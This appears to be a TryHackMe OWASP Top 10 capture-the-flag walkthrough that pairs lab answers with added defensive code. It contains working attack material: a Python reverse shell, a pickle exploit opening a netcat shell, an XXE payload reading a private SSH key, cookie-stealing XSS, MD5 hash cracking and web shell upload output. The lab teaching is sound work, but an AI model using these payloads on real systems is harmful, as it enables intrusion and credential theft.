OWASP Top 10 - TryHackMe (Only practical tasks)


Task 5 : [Severity 1] Command Injection Practical

Go to the link; mine was http://10.10.163.167/evilshell.php.

  1. What strange text file is in the website root directory?
    (when you use the ‘ls’ command in the web shell)
drpepper.txt
  2. How many non-root/non-service/non-daemon users are there?
    (You can see them in the passwd file; simply use the command cat /etc/passwd and look for the users)
0
  3. What user is this app running as?
    (Simply use the ‘whoami’ command to see who the user is)
www-data
  4. What is the user’s shell set as? (cat /etc/passwd)
/usr/sbin/nologin
  5. What version of Ubuntu is running?
    (You can use ‘lsb_release -a’ to see the version number)
18.04.4
  6. Print out the MOTD. What favorite beverage is shown?
    (You can ‘cat’ that file like this: cat /etc/update-motd.d/00-header)
DR PEPPER

Since we can do command injection, let's get a reverse shell!

/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
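The reason evilshell.php works is that the request parameter is spliced straight into a shell command line. The example below is added here and is not code from the room or from this writeup: it uses `echo` as a stand-in for the ping/whoami style lookup so it runs offline, and contrasts the vulnerable `shell=True` concatenation with the argv-list form plus an allow-list on the host parameter (the `HOST_RE` pattern and function names are my own).

```python
import re
import subprocess

# Allow-list for a host parameter: hostname or IPv4 characters only (assumed policy).
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def is_valid_host(value):
    return HOST_RE.fullmatch(value) is not None


def run_vulnerable(user_input):
    # Vulnerable shape (the evilshell pattern): user input concatenated into a
    # command line handed to /bin/sh. `echo` stands in for ping/whoami so the
    # example runs offline; the shell still honours `;`, `|`, `$(...)` etc.
    result = subprocess.run("echo " + user_input, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def run_argv_only(user_input):
    # First fix: argv list, no shell. Metacharacters are passed as plain data.
    result = subprocess.run(["echo", user_input], capture_output=True, text=True)
    return result.stdout


def run_hardened(user_input):
    # Second fix on top: reject anything that is not a plausible host before it
    # reaches the process at all. The argv form alone already stops injection;
    # the allow-list also stops stray flags and oversized values.
    if not is_valid_host(user_input):
        raise ValueError("rejected host parameter: %r" % user_input)
    return run_argv_only(user_input)


if __name__ == "__main__":
    payload = "10.10.163.167; echo INJECTED"
    print("vulnerable:", repr(run_vulnerable(payload)))   # two commands ran
    print("argv only :", repr(run_argv_only(payload)))    # one command, literal text
    try:
        run_hardened(payload)
    except ValueError as err:
        print("hardened  :", err)
```

With the payload above the vulnerable path prints two lines (the second command really ran), the argv path prints the whole string as one literal argument, and the hardened path never starts a process.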

Task 7 : [Severity 2] Broken Authentication Practical

My IP was http://10.10.207.113:8888, so go to the link and register as darren with some example email and a password. Then log into the account (use a space and the name). After that you can see the flag. Do the same thing with arthur.
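What makes this work is a registration check that compares the raw username string, so a variant of an existing name is accepted as a brand-new account. The following is an added example (not the room's application code): a naive registry beside one that canonicalises usernames (trim plus case-fold), rejects surrounding whitespace, and looks accounts up by the canonical form. Passwords are stored with PBKDF2 only so that the example does not keep plaintext; the class and function names are mine.

```python
import hashlib
import secrets


def normalize_username(raw):
    # Canonical form for uniqueness and lookup: " darren", "Darren" and "darren"
    # all map to the same account key.
    return raw.strip().casefold()


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class NaiveRegistry:
    """Weak behaviour: uniqueness is checked on the raw string, so a name with a
    leading space registers as a second user that shares the display name."""

    def __init__(self):
        self.users = {}

    def register(self, username, password):
        if username in self.users:
            raise ValueError("username taken")
        salt = secrets.token_bytes(16)
        self.users[username] = (salt, _hash(password, salt))
        return username

    def login(self, username, password):
        rec = self.users.get(username)
        return rec is not None and secrets.compare_digest(rec[1], _hash(password, rec[0]))


class HardenedRegistry(NaiveRegistry):
    def register(self, username, password):
        key = normalize_username(username)
        if not key:
            raise ValueError("empty username")
        if key != username.casefold():
            raise ValueError("username must not start or end with whitespace")
        return super().register(key, password)   # uniqueness on the canonical key

    def login(self, username, password):
        return super().login(normalize_username(username), password)


def demo():
    naive = NaiveRegistry()
    naive.register("darren", "pw1")
    naive.register(" darren", "pw2")            # accepted: a second "darren"
    hardened = HardenedRegistry()
    hardened.register("darren", "pw1")
    rejected = []
    for variant in (" darren", "Darren", "darren "):
        try:
            hardened.register(variant, "pw2")
        except ValueError:
            rejected.append(variant)
    return {
        "naive_accounts": len(naive.users),
        "naive_login_as_space_darren": naive.login(" darren", "pw2"),
        "hardened_rejected": rejected,
        "hardened_login_normalised": hardened.login("  DARREN ", "pw1"),
        "hardened_wrong_password": hardened.login("darren", "nope"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=", v)
```

The check worth keeping from this is the second one: uniqueness must be enforced on the same canonical form that login uses, otherwise every normalisation gap is a duplicate-account bug.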

Task 8 : [Severity 3] Sensitive Data Exposure (Introduction)

Go to the IP; mine was http://10.10.66.141/.

  1. What is the name of the mentioned directory?

Look at the hint; it mentions the login page http://10.10.66.141/login/.
Go there and view the page source. You can see a comment like this, so the answer is /assets:

<!-- Must remember to do something better with the database than store it in /assets... -->

If you scan this IP address with nmap you can see some open ports; go check each one of them :)

  2. Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Now go to http://10.10.66.141/assets/; there you can see the webapp.db file.

  3. Use the supporting material to access the sensitive data. What is the password hash of the admin user?

You can get this file by simply clicking on it, or with wget like this: ‘wget http://10.10.66.141/assets/webapp.db’. Then open it with sqlite3:

sqlite> PRAGMA table_Info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite> select * From users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite> 

  4. What is the admin’s plaintext password?

Here you can use CrackStation,

or you can use CyberChef to crack this MD5 hash, or you can use hashcat:

hashcat -m 0 <hash> <wordlist>

Output:

┌─[visith@parrot]─[~/CTF/thm/owasp]
└──╼ $hashcat -m 0 6eea9b7ef19179a06954edd0f6c05ceb /opt/SecLists/Passwords/2020-200_most_used_passwords.txt
----snip----
Approaching final keyspace - workload adjusted.  

6eea9b7ef19179a06954edd0f6c05ceb:qwertyuiop      
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 6eea9b7ef19179a06954edd0f6c05ceb
Time.Started.....: Mon May 24 20:02:17 2021 (0 secs)
Time.Estimated...: Mon May 24 20:02:17 2021 (0 secs)
Guess.Base.......: File (/opt/SecLists/Passwords/2020-200_most_used_passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     2987 H/s (0.03ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 200/200 (100.00%)
Rejected.........: 0/200 (0.00%)
Restore.Point....: 0/200 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> angel1
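The hash fell in well under a second because the application stored unsalted MD5, so one hash computation per candidate word covers every account in the table. The example below is added here, not taken from the room: it loads the rows from the dump above into an in-memory SQLite database with the same schema, runs a defender-side audit that does what `hashcat -m 0` did against a small constructed wordlist, and shows the storage scheme that should have been used (random per-user salt plus PBKDF2-HMAC-SHA256, constant-time comparison). Function names and the wordlist are my own.

```python
import hashlib
import hmac
import os
import sqlite3

# Rows copied from the page's webapp.db dump (userID, username, password, admin).
ROWS = [
    ("4413096d9c933359b898b6202288a650", "admin", "6eea9b7ef19179a06954edd0f6c05ceb", 1),
    ("23023b67a32488588db1e28579ced7ec", "Bob", "ad0234829205b9033196ba818f7a872b", 1),
    ("4e8423b514eef575394ff78caed3254d", "Alice", "268b38ca7b84f44fa0a6cdc86e6301e0", 0),
]

# Constructed five-entry wordlist standing in for the SecLists file used above.
WORDLIST = ["123456", "password", "qwertyuiop", "letmein", "angel1"]


def load_db():
    # Same schema as the PRAGMA table_info output, but in memory.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (userID TEXT NOT NULL PRIMARY KEY, "
                "username TEXT NOT NULL, password TEXT NOT NULL, admin INT NOT NULL)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    con.commit()
    return con


def audit_unsalted_md5(con, wordlist):
    """Audit: which stored values are the plain MD5 of a common password.
    One digest per word is compared against every row, which is exactly why
    an unsalted fast hash falls to a 200-word list instantly."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    hits = {}
    for username, stored in con.execute("SELECT username, password FROM users"):
        if stored.lower() in lookup:
            hits[username] = lookup[stored.lower()]
    return hits


def hash_password(password, iterations=600_000):
    # Replacement scheme: random per-user salt + PBKDF2-HMAC-SHA256, stored as a
    # self-describing string so the work factor can be raised later.
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    print("weak hashes matched:", audit_unsalted_md5(load_db(), WORDLIST))
    stored = hash_password("qwertyuiop")
    print("new format:", stored)
    print("verify ok:", verify_password("qwertyuiop", stored))
```

With the salted scheme the same password produces a different stored value for every user, so a wordlist has to be re-hashed per account at the full iteration cost instead of once for the whole table.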
  5. Login as the admin. What is the flag?
    Go to the login page and enter those credentials; if you log in successfully you can see the flag.

Task 16 : [Severity 4] XML External Entity - Exploiting

  1. What are the first 18 characters of falcon’s private key?
    In the previous task we found out where falcon's SSH key is located, so we can change the payload to read falcon's SSH key like this:
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///home/falcon/.ssh/id_rsa'>]><root>&test;</root>

When you get the key, count the first 18 characters and submit them.
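The fix on the server side is to refuse the DOCTYPE before the parser ever resolves an entity. The snippet below is an added example and not the room's code: it runs untrusted XML through an expat pre-flight that aborts on any DOCTYPE or ENTITY declaration (the same rule defusedxml applies) and only then hands the document to ElementTree. The payload above is kept as constructed test input; the helper names are mine.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

# The page's payload, kept here as constructed test input for the guard below.
XXE_PAYLOAD = ('<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM '
               "'file:///home/falcon/.ssh/id_rsa'>]><root>&test;</root>")


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or ENTITY declaration."""


def _on_doctype(name, sysid, pubid, has_internal_subset):
    raise DoctypeRejected("DOCTYPE '%s' not allowed in untrusted input" % name)


def _on_entity(name, is_param, value, base, sysid, pubid, notation):
    raise DoctypeRejected("entity '%s' (SYSTEM %r) not allowed" % (name, sysid))


def parse_untrusted_xml(data):
    # Pre-flight: expat reports the DOCTYPE before it processes the internal
    # subset, so the handler fires before any external entity could be fetched.
    guard = expat.ParserCreate()
    guard.StartDoctypeDeclHandler = _on_doctype
    guard.EntityDeclHandler = _on_entity
    guard.Parse(data, True)
    # Only documents without a DTD reach the real parser.
    return ET.fromstring(data)


def is_safe_xml(data):
    """True when the document parses and carries no DTD; False when it is
    rejected as dangerous or is simply malformed."""
    try:
        parse_untrusted_xml(data)
    except (DoctypeRejected, ET.ParseError, expat.ExpatError):
        return False
    return True


if __name__ == "__main__":
    print("benign :", parse_untrusted_xml("<root>hello</root>").text)
    try:
        parse_untrusted_xml(XXE_PAYLOAD)
    except DoctypeRejected as err:
        print("blocked:", err)
```

Rejecting the whole DOCTYPE is deliberate: distinguishing "harmless" internal entities from external ones is where parser-specific surprises live, and ordinary data exchange does not need a DTD.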

Task 18 : [Severity 5] Broken Access Control (IDOR Challenge)

  1. Look at other users notes. What is the flag?

When you go to http://10.10.97.22/ you can see the login.
Go ahead and log in to the noot account with the given credentials. Then you can see ‘I am noot’.

So our task is simple: we need to change the parameter value.

http://10.10.97.22/note.php?note=1

Here one (1) is the parameter value; we can simply change it. But we don’t know exactly the correct value for the page where our flag is stored, so you can fire up Burp, send the above link to Intruder and start an attack with a number payload.

How to do the IDOR attack with burp

We got a hit on zero (0). When we simply click the value zero we can see the flag, or you can go to the page by updating the value to zero.
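Two things are missing on the server here: an ownership check on `note`, and any visibility of the sequential probing that Intruder produces. The example below is added and is not the room's note.php: a constructed in-memory note store with the vulnerable lookup beside an owner-checked one, and a small detector over constructed access-log lines that flags a session denied across several distinct note ids. The log format, note contents and thresholds are assumptions.

```python
import collections
import re

# Constructed note store: note id -> (owner, body). Note 0 plays the role of the
# note the challenge reaches by changing ?note=1 to ?note=0.
NOTES = {
    0: ("admin", "flag{constructed-placeholder}"),
    1: ("noot", "I am noot"),
    2: ("alice", "shopping list"),
}


class Forbidden(Exception):
    pass


def get_note_vulnerable(session_user, note_id):
    # IDOR: the lookup uses only the client-supplied id; session_user is ignored.
    return NOTES[note_id][1]


def get_note(session_user, note_id):
    owner, body = NOTES.get(note_id, (None, None))
    if owner != session_user:
        # One error for "not yours" and "does not exist", so the response does
        # not reveal which ids are in use.
        raise Forbidden("note not found")
    return body


def can_read(session_user, note_id):
    try:
        get_note(session_user, note_id)
    except Forbidden:
        return False
    return True


# Constructed access-log lines: client, session user, request, status.
LOG = """\
10.9.2.175 noot "GET /note.php?note=1" 200
10.9.2.175 noot "GET /note.php?note=0" 403
10.9.2.175 noot "GET /note.php?note=2" 403
10.9.2.175 noot "GET /note.php?note=3" 403
10.9.2.175 noot "GET /note.php?note=4" 403
10.9.2.176 alice "GET /note.php?note=2" 200
"""

_LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<user>\S+) "GET /note\.php\?note=(?P<id>\d+)" (?P<status>\d{3})$')


def find_enumeration(log_text, threshold=3):
    """Detection: users whose denied requests span `threshold` or more distinct
    note ids, the trace a number-payload attack leaves once the owner check exists."""
    denied = collections.defaultdict(set)
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if m and m.group("status") == "403":
            denied[m.group("user")].add(int(m.group("id")))
    return {user: sorted(ids) for user, ids in denied.items() if len(ids) >= threshold}


if __name__ == "__main__":
    print("vulnerable noot reads note 0:", get_note_vulnerable("noot", 0))
    print("hardened  noot reads note 0:", can_read("noot", 0))
    print("enumeration suspects:", find_enumeration(LOG))
```

The detector only has something to count once the ownership check is in place, which is the usual order of work: fix the authorisation, then alert on the 403 bursts that the fix makes visible.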

Task 19 : [Severity 6] Security Misconfiguration

  1. Hack into the webapp, and find the flag!?

Hint: Can you find the app’s source code? Maybe the documentation gives you default credentials that you can try.

In the hints they said we need to look into the app's source code. When you simply search for it on Google you can see the GitHub page. They provided the default credentials in README.md.

Task 20 : [Severity 7] Cross-site Scripting

  1. Navigate to http://10.10.122.166/ in your browser and click on the “Reflected XSS” tab on the navbar; craft a reflected XSS payload that will cause a popup saying “Hello”?

Here you can see the search bar in the reflected XSS area, so we can run our XSS script.

<script>alert("Hello")</script>

After you search, ‘Hello’ will pop up. After we click ‘OK’, in another prompt you can see our flag or answer.

  2. On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address?

Hint: In JavaScript window.location.hostname will show your hostname; in this case your deployed machine’s hostname will be its IP.

Here we can simply change our JavaScript like this (note that window.location.hostname must not be quoted, otherwise the alert shows the literal text instead of the hostname).

<script>alert(window.location.hostname)</script>

  3. Then add a comment and see if you can insert some of your own HTML?

When you go into the site you can click the ‘here for hints’ link; then you are redirected to the /stored# site. After that you can see the page source for the hints.

Here you need to create an account and go back to the stored XSS page. Here we can comment.

<html>
<body>
<h1>Button default</h1>
<button type="button" onclick="alert('Hello')">Click Me</button>
</body>
</html>

After you enter it, click the create button. Here we go: we have the answer to the first question.

  4. On the same page, make an alert popup box appear on the page with your document cookies?
<script>alert(document.cookie)</script>

When you type this in the comment box you get the cookie values and the flag.

  5. Change “XSS Playground” to “I am a hacker” by adding a comment and using JavaScript?

Take a look at the hints. You can see this JS code.

<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>

Now we have the answer to question 3.
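Every payload in this task works for the same reason: the search term and the comment body are written into the page as raw HTML. The example below is added here and is not the playground's code: a vulnerable renderer next to escaped renderers for the reflected and stored cases, plus a small audit that checks whether any of the payloads quoted above survive as live markup. The renderer names and the attribute-breakout variant in the payload list are my own.

```python
import html
import re

# Payloads quoted from the task, plus one constructed attribute-breakout variant.
PAYLOADS = [
    '<script>alert("Hello")</script>',
    "<script>alert(document.cookie)</script>",
    "<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>",
    '"><img src=x onerror=alert(1)>',
]

# Crude detector for a live tag or inline event handler in rendered HTML.
_LIVE_MARKUP = re.compile(r"<\s*script\b|<[a-zA-Z][^>]*\bon\w+\s*=", re.I)


def leaks_script(fragment):
    return _LIVE_MARKUP.search(fragment) is not None


def render_search_vulnerable(term):
    # Reflected XSS: the search term is echoed into the page unchanged.
    return "<p>You searched for: %s</p>" % term


def render_search(term):
    # Fix: escape for the HTML text context at the point of interpolation.
    return "<p>You searched for: %s</p>" % html.escape(term, quote=True)


def render_comment(author, body):
    # Stored XSS: values read back from the database get the same treatment;
    # quote=True matters for the attribute context (data-author).
    return '<div class="comment" data-author="%s"><p>%s</p></div>' % (
        html.escape(author, quote=True), html.escape(body, quote=True))


def audit(renderer):
    """Return the payloads that a renderer lets through as live markup."""
    return [p for p in PAYLOADS if leaks_script(renderer(p))]


if __name__ == "__main__":
    print("vulnerable search leaks :", len(audit(render_search_vulnerable)), "of", len(PAYLOADS))
    print("escaped search leaks    :", audit(render_search))
    print("escaped comment leaks   :", audit(lambda p: render_comment("noot", p)))
    print(render_search(PAYLOADS[0]))
```

`html.escape` is the right tool for HTML text and quoted-attribute contexts only; a value dropped inside a `<script>` block, a URL, or an unquoted attribute needs that context's own encoding, and a Content-Security-Policy without `'unsafe-inline'` is the backstop when a template slips.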

Task 25 : [Severity 8] Insecure Deserialization - Cookies Practical

When you go to the machine given in Task 21 you can see the beautiful web page.

  1. 1st flag (cookie value)?

When you go into “Inspect Element” and navigate to the “Storage” tab, you can see the cookies. Go ahead, get the session ID value and decode it from base64:

echo <value> | base64 -d

Here you can get the first flag.

  2. 2nd flag (admin dashboard)?

Go to http://10.10.141.135/admin and get the flag.

Task 26 : [Severity 8] Insecure Deserialization - Code Execution

First you need to create a netcat listener:

nc -lnvp 9999

Then we need to make our exploit.py file. Notice: you need to put your VPN IP (tun0) in it.

#!/usr/bin/env python3
import pickle
import sys
import base64

# command the server runs when it unpickles the cookie (fill in your tun0 IP)
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat <Your $IP> 9999 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))

After we execute it we get a cookie. Now we need to replace the original cookie with ours, reload the page, and finally we get our netcat shell.
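Both of the deserialization tasks come down to the same server-side mistake: the session cookie is base64 of a pickle, so the client controls what gets unpickled (Task 25 shows that by decoding it; this task shows what `__reduce__` can do on load). The example below is added here and is not the room's app.py. It shows the two defensive options: an allow-list `Unpickler` (the pattern from the Python pickle documentation) that refuses the `os.system` global before `REDUCE` ever runs, and the better replacement, an HMAC-signed JSON cookie that a client cannot alter without the key. The `Gadget` class mirrors the shape of the rce class above but carries a no-op command; the secret, field names and helper names are constructed.

```python
import base64
import hashlib
import hmac
import io
import json
import os
import pickle


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler: any global outside SAFE (os.system, subprocess.*,
    ...) raises before the REDUCE opcode can call it."""
    SAFE = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"),
            ("builtins", "int"), ("builtins", "bool")}

    def find_class(self, module, name):
        if (module, name) in self.SAFE:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Gadget:
    # Same shape as the rce class above, but with a no-op command so the object
    # is harmless even if someone feeds it to plain pickle.loads.
    def __reduce__(self):
        return (os.system, ("true",))


def benign_pickle():
    return pickle.dumps({"user": "guest", "admin": False})


def gadget_pickle():
    return pickle.dumps(Gadget())


def unpickle_is_rejected(data):
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


# Replacement format: signed JSON. Constructed secret standing in for real key material.
SECRET = b"constructed-server-side-secret-change-me"


def make_cookie(session, key=SECRET):
    body = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    sig = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + sig


def read_cookie(cookie, key=SECRET):
    body, _, sig = cookie.rpartition(".")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("cookie signature mismatch")
    return json.loads(base64.urlsafe_b64decode(body))


def cookie_is_valid(cookie, key=SECRET):
    try:
        read_cookie(cookie, key)
    except ValueError:          # covers bad signature, bad base64 and bad JSON
        return False
    return True


def forge_body(session, original_cookie):
    # What a client without the key can do: swap the body, keep the old signature.
    body = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    return body + "." + original_cookie.rpartition(".")[2]


if __name__ == "__main__":
    print("benign pickle loads:", restricted_loads(benign_pickle()))
    print("gadget rejected    :", unpickle_is_rejected(gadget_pickle()))
    cookie = make_cookie({"user": "guest", "admin": False})
    print("cookie             :", cookie)
    print("forged valid?      :", cookie_is_valid(forge_body({"user": "guest", "admin": True}, cookie)))
```

The allow-list unpickler is a containment measure for code you cannot rewrite yet; the signed-JSON cookie removes the deserialization sink entirely, which is the fix to aim for.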

To get a normal shell:

script -qc /bin/bash /dev/null
┌─[visith@parrot][~/CTF/thm/owasp]
└──╼ $nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.9.2.175] from (UNKNOWN) [10.10.186.100] 59234
/bin/sh: 0: can't access tty; job control turned off
$ script -qc /bin/bash /dev/null
cmnatic@owasp10-a8-cmnatic:~/app$ ls
ls
app.py      launch.sh         static     venv
Dockerfile  __pycache__       templates  vimexchange.sock
index.html  requirements.txt  user.html  wsgi.py
cmnatic@owasp10-a8-cmnatic:~/app$ cd ..
cd ..
cmnatic@owasp10-a8-cmnatic:~$ ls
ls
app  flag.txt  launch.log

Task 29 : [Severity 9] Components With Known Vulnerabilities - Lab

  1. How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

We know the store name is CSE store; now we need to search for vulnerabilities in this web app.

Here is the Exploit-DB page for this web app.

Link to the exploit

┌─[visith@parrot][~/CTF/thm/owasp]
└──╼ $python exploit.py http://10.10.184.133/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.184.133/bootstrap/img/DjEVX5UcgG.php
> Example command usage: http://10.10.184.133/bootstrap/img/DjEVX5UcgG.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ ls
4Bp1GgO6Ye.php
DjEVX5UcgG.php
I9DXsSGS3d.php

We got the www-data shell; now we need to use wc -c /etc/passwd to get the answer.
